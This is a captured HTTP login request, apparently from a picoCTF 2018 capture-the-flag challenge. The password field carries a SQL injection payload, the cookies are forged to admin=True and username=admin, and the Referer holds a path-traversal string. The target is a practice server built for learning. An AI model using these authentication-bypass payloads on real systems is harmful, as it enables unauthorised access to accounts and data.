POST /login.php HTTP/1.1
Host: 2018shell.picoctf.com:52135
Content-Length: 52
Cache-Control: max-age=0
Origin: http://2018shell.picoctf.com:52135
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://2018shell.picoctf.com:52135/login.html?id=../../
Accept-Encoding: gzip, deflate
Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.2.801383206.1556045450; _gid=GA1.2.1584846316.1556242595; password=; admin=True; username=admin; _gat=1
Connection: close

username=admin&password=%27+or+1+%3D+1%3B+--&debug=0